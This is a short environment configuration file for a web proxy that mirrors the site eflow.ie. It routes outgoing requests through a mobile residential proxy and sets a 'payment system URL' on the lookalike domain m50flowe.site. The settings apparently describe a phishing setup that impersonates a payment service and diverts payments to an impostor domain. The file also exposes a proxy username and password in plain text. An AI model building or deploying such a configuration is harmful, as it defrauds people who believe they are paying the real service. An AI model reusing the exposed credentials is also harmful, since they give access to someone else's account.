# Target website to proxy
TARGET_URL=https://eflow.ie

# Logging
LOG_LEVEL=info
LOG_REQUESTS=true

# Features
ENABLE_WEBSOCKET=true
ENABLE_COMPRESSION=true

# Proxy timeout (in milliseconds) - 120 seconds
PROXY_TIMEOUT=120000

# External proxy for outgoing requests
USE_PROXY=true
PROXY_HOST=geo.iproyal.com
PROXY_PORT=12321
PROXY_USERNAME=zrwbc7fv1p-mobile-country-FR
PROXY_PASSWORD=Y5zLYVxIQz7xb8Dq

# Payment system URL
PAYMENT_SYSTEM_URL=https://m50flowe.site
